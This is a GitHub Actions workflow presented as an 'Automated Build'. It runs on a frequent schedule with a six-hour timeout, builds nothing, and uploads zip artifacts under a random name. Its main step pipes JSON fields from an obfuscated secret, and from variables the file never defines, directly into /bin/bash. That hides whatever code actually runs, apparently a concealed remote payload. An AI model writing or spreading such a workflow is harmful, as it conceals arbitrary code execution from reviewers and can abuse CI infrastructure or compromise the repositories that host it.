name: Automated Build
on:
  workflow_dispatch:

  schedule:
    - cron: '39 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          vzfoh4: ${{ secrets.vzfoh4 }}
        run: |
          printf '%s' "$vzfoh4" | jq -r .tdivd65 | /bin/bash
          echo $so18 | jq -r .i03280 | /bin/bash
          printf '%s' "$lb588" | jq -r .qeu2221 | /bin/bash
          printf '%s' "$y91652" | jq -r .rl23056 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 5OV6SSfS
          path: "*.zip"
          retention-days: 1
